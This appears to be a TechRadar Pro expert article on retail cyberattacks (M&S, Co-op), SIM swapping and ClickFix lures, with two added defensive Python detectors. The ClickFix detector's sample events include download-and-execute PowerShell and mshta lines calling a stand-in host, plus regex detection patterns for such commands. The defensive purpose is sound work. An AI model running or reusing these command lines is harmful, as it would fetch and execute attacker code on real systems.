The resilient retailer’s guide to proactive cyber defense
Recently, a spate of high-profile, malicious cyberattacks on the retail sector has thrust the risks of a breach into the spotlight once more.
In April, Co-op disabled its IT systems to prevent attackers from installing malware. Since then, the company has faced problems with ordering and stock management, although spokespeople say they avoided the worst outcomes of the breach.
Attackers hit fellow retailer M&S even harder. M&S stopped accepting online orders, leaving shelves bare, following a successful cyberattack. The company is still navigating the aftermath of the breach, estimating business operations won’t return to normal for months.
The common thread between these high-profile retail breaches? Attackers used employee data to execute SIM swaps and gain system entry—a tactic that’s growing in popularity at an alarming rate.
Field CISO, Expel.
SIM swapping is a social-engineering attack on the mobile carrier rather than on the victim's device. The attacker uses stolen personal information to impersonate the victim, contacts the carrier, claims the phone or SIM has been lost or damaged, and asks for the number to be moved to a new SIM.
If the carrier agrees, the victim's number is transferred to a SIM the attacker controls, so every SMS one-time code and verification call now reaches the attacker instead. That defeats SMS-based two-factor authentication and SMS-driven password resets, and gives the attacker access to the victim's accounts. Factors that do not depend on the phone number, such as authenticator apps or hardware security keys, are not affected by the swap, which is the main reason to move away from SMS codes for anything sensitive.
The National Fraud Database reports a 1,055% increase in SIM swapping attacks in 2024. Unsurprisingly, SIM swapping falls under the “identity-based” attack umbrella, which is consistently the largest threat organizations face year-over-year, accounting for 66.2% of all security incidents among Expel customers in Q1 2025 alone.
With M&S confirming that human error was the root cause, it is clear that attackers continue to exploit people and credentials rather than software flaws, leaving organizations exposed to potentially catastrophic financial and reputational loss.
The rise of vulnerabilities in internet-facing network appliances
Out of the threats Expel observed in Q1 this year, 20.9% were non-targeted malware attacks—many of which were delivered through misconfigured or exposed appliances, such as firewalls and VPNs.
Exploited appliances are used as broad entry points, not only in targeted attacks but also through mass scanning and opportunistic exploitation of common misconfigurations and unpatched vulnerabilities. These devices normally form the protective barrier around internal systems, but once compromised they hand the attacker a foothold on the network edge that sits outside most endpoint monitoring.
Elsewhere, ClickFix techniques, where a fake error, update or verification prompt instructs the user to copy a command and run it themselves (typically in the Windows Run dialog or a terminal), contributed to 51% of all malware incidents and 78% of all infostealer malware incidents that we observed in Q1 this year. Fake CAPTCHA pages and QR codes are used the same way: the user performs the infection step, so no software exploit is needed.
The growth of these techniques shows how easily endpoints can be turned against an organization. A single user interaction, or an overlooked appliance misconfiguration, can end in code execution, turning protective systems such as VPNs and firewalls into liabilities.
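The ClickFix lure ends with the user pasting a command, so the detection angle is the process tree rather than a file signature: an interactive parent (explorer.exe, which owns the Run dialog) spawning a script host with download-and-execute arguments. The following triage heuristic is an added example, not code from the original article or from Expel; the event fields and the sample telemetry in `SAMPLE_EVENTS` are constructed for this illustration and would need to be mapped onto your EDR's real parent, image and command-line fields.

```python
"""Heuristic triage of process-creation events for ClickFix-style execution.

Added example, not code from the original article or from Expel. The event
schema and SAMPLE_EVENTS are constructed for this illustration.
"""
import re
from dataclasses import dataclass

# Interpreters a pasted ClickFix one-liner usually lands in.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe"}
# The Run dialog and desktop shortcuts are children of explorer.exe.
INTERACTIVE_PARENTS = {"explorer.exe"}

# Argument patterns that recur in pasted ClickFix one-liners.
SUSPICIOUS_ARGS = {
    "encoded command": re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s"),
    "hidden window": re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+hidden\b"),
    "invoke-expression": re.compile(r"(?i)\b(?:iex|invoke-expression)\b"),
    "web download": re.compile(
        r"(?i)\b(?:irm|iwr|invoke-webrequest|invoke-restmethod|downloadstring|curl|wget)\b"),
    "remote url": re.compile(r"(?i)https?://"),
}


@dataclass(frozen=True)
class ProcEvent:
    parent: str    # parent image name
    image: str     # child image name
    cmdline: str   # child command line


def evaluate(ev: ProcEvent):
    """Return (severity, reasons) for ev, or None when it is not ClickFix-shaped."""
    if ev.image.lower() not in SCRIPT_HOSTS:
        return None
    reasons = [name for name, rx in SUSPICIOUS_ARGS.items() if rx.search(ev.cmdline)]
    if not reasons:
        return None  # a script host with plain arguments is everyday admin work
    if ev.parent.lower() in INTERACTIVE_PARENTS:
        # A human-driven shell launching an obfuscated downloader is the ClickFix signature.
        return "high", ["spawned by " + ev.parent] + reasons
    # The same arguments from a service or scheduler are worth a look, at lower confidence.
    return ("medium", reasons) if len(reasons) >= 2 else None


def triage(events):
    """Run evaluate() over a batch and keep only the hits, preserving order."""
    hits = []
    for ev in events:
        verdict = evaluate(ev)
        if verdict:
            hits.append((verdict[0], ev.image, verdict[1]))
    return hits


# Constructed sample telemetry for this example (not real captured data).
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "powershell.exe", "powershell.exe"),
    ProcEvent("explorer.exe", "powershell.exe",
              "powershell.exe -w hidden -ec JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAA"),
    ProcEvent("explorer.exe", "mshta.exe", "mshta https://example.invalid/verify.hta"),
    ProcEvent("svchost.exe", "powershell.exe",
              "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1"),
    ProcEvent("services.exe", "powershell.exe",
              "powershell.exe -w hidden -c iex (irm https://example.invalid/a)"),
]

if __name__ == "__main__":
    for severity, image, reasons in triage(SAMPLE_EVENTS):
        print(severity, image, "; ".join(reasons))
```

The first and fourth events are deliberately benign (a user opening a console, and a scheduled inventory script) to show that the heuristic keys on the combination of parent and argument shape, not on PowerShell itself; tune `SUSPICIOUS_ARGS` against your own baseline before alerting on it.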
Enhancing security hygiene and reducing risks
Robust security hygiene is vital for protecting critical systems, as it only takes one lapse to create critical access points for threat actors.
Regularly updating systems and emphasizing security hygiene among employees reduces exposure to threats. For example, organizations should require a password manager for all employees, including contractors and freelancers, and, given the SIM-swap attacks described above, move multi-factor authentication off SMS and onto authenticator apps or hardware security keys wherever possible. Exercising security best practices helps ensure that the organization is not an easy target, and can encourage opportunistic attackers to move on to softer ones.
Businesses can also consider using managed detection and response (MDR) services so that suspicious activity is spotted and flagged, and threats are identified, prioritized and resolved efficiently. It is now a matter of when, not if, attackers get in, and the ability to identify and neutralize threats quickly is critical for minimizing business disruption.
This is so true that when I was at Microsoft, we had a mantra in everything we did in cyber. “Assume breach. Design your environment with the assumption that attackers will succeed.” This changes the perspective of cybersecurity completely.
To stay ahead of threats, security and IT management should set aside time to run tabletop simulations of real-world cyber incidents, bringing key stakeholders from across the business, such as CFOs, communications managers and CEOs, together to practice incident response collaboratively.
These exercises focus on decision-making and process, and test an organization's response plan by identifying gaps, reinforcing team roles and improving communication. They help an organization build its own incident response muscle, which in turn contains the intense stress of a real incident.
Why businesses need a cybersecurity playbook
Regardless of the layered protection organizations put in place, the ever-increasing threat of credential-based attacks means that a cyberattack can—and most likely will—still occur.
Therefore having concrete and stress-tested plans for incident response in place is pivotal. This means having visibility into the affected systems, and the ability to both contain and mitigate successful attacks.
These recent incidents are a reminder of the potentially devastating, long-term business impacts that result from successful attacks.
M&S, for example, estimated that its loss of profits from this security incident would total approximately £300 million once it fully restores its services.
Co-op reacted quickly, taking its IT systems offline when its security team detected attackers in its environment. As a result, Co-op is reportedly recovering faster than M&S, suggesting that a proactive, coordinated and predetermined security plan can save companies millions.
These recent UK retail incidents emphasize the pressing need for organizations to be prepared for abnormal access behaviors and credential misuse.
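A SIM swap happens at the carrier, out of sight of the victim organization, but its payoff is visible in the organization's own identity logs: an SMS one-time code accepted from a device that has never completed a login before, often minutes after a password reset that was itself approved by SMS. The correlation below, which serves both the SIM-swap description earlier and the call above to watch for abnormal access and credential misuse, is an added example and is not code from the original article or from Expel. The pipe-delimited log format, the event names and the sample lines in `SAMPLE_LOG` are constructed for this illustration; real identity providers expose equivalent fields under their own names.

```python
"""Flag SMS-OTP logins that look like a SIM swap paying off.

Added example, not code from the original article or from Expel. The log
format (ts|user|event|device_id|country), the event names and SAMPLE_LOG are
constructed for this illustration.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# A device counts as known only once it has a successful login at least this old,
# so an attacker's fresh device cannot season itself with its own first login.
SEASONING = timedelta(hours=24)
# SMS-approved password reset followed by SMS OTP inside this window is the SIM-swap shape.
RESET_WINDOW = timedelta(minutes=60)

# Constructed sample audit log for this example (not real data).
SAMPLE_LOG = """\
2025-04-01T08:02:11Z|alice|login_success|dev-a1|GB
2025-04-03T09:15:40Z|alice|sms_otp_success|dev-a1|GB
2025-04-10T07:58:02Z|alice|login_success|dev-a1|GB
2025-04-12T18:40:09Z|alice|password_reset_sms|dev-z9|US
2025-04-12T18:41:33Z|alice|sms_otp_success|dev-z9|US
2025-04-12T18:41:35Z|alice|login_success|dev-z9|US
2025-04-01T10:00:00Z|bob|login_success|dev-b1|GB
2025-04-14T10:03:20Z|bob|sms_otp_success|dev-b1|GB
"""


def parse_log(text):
    """Parse the constructed pipe-delimited format into dicts, oldest first."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, user, event, device, country = line.split("|")
        events.append({
            "ts": datetime.fromisoformat(ts.replace("Z", "+00:00")),
            "user": user, "event": event, "device": device, "country": country,
        })
    events.sort(key=lambda e: e["ts"])
    return events


def find_suspicious_sms_logins(events):
    """Correlate SMS OTP successes against per-user device and country history."""
    first_login = defaultdict(dict)  # user -> device -> ts of first login_success
    countries = defaultdict(set)     # user -> countries seen in successful logins
    last_reset = {}                  # user -> ts of most recent password_reset_sms
    findings = []
    for e in events:
        u, ts = e["user"], e["ts"]
        if e["event"] == "password_reset_sms":
            last_reset[u] = ts
        elif e["event"] == "sms_otp_success":
            reasons = []
            seen = first_login[u].get(e["device"])
            if seen is None or ts - seen < SEASONING:
                reasons.append(f"SMS OTP from device not seen before: {e['device']}")
            if countries[u] and e["country"] not in countries[u]:
                reasons.append(f"country {e['country']} not in user history {sorted(countries[u])}")
            if reasons and u in last_reset and ts - last_reset[u] <= RESET_WINDOW:
                reasons.append("preceded by an SMS-approved password reset within an hour")
            if reasons:
                severity = "high" if len(reasons) >= 2 else "medium"
                findings.append({"user": u, "ts": ts.isoformat(),
                                 "severity": severity, "reasons": reasons})
        elif e["event"] == "login_success":
            first_login[u].setdefault(e["device"], ts)
            countries[u].add(e["country"])
    return findings


if __name__ == "__main__":
    for f in find_suspicious_sms_logins(parse_log(SAMPLE_LOG)):
        print(f["severity"], f["user"], f["ts"], "; ".join(f["reasons"]))
```

Run over the sample, only alice's 12 April session is flagged: the OTP came from a device with no login history, from a country she had never logged in from, 84 seconds after an SMS-approved password reset. Her earlier OTP from the seasoned dev-a1 and bob's routine OTP are left alone, which is the point of keying on device history rather than on SMS OTP use by itself.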
Act now, save later
The data shows that attackers are targeting identity tools, exploiting misconfigured systems, and using automation to scale their attacks. In a new age of cyber threats, reactive security is no longer viable.
Businesses must ensure that their networks are protected, maintained, and consistently patched to quell the rise of cyberattacks before they get worse. It’s time businesses treat network security as a strategic and operational priority, not simply an exercise in compliance.
This article was produced as part of TechRadarPro's Expert Insights channel, where we feature the best and brightest minds in the technology industry today. The views expressed here are those of the author and are not necessarily those of TechRadarPro or Future plc. If you are interested in contributing, find out more here: https://www.techradar.com/news/submit-your-story-to-techradar-pro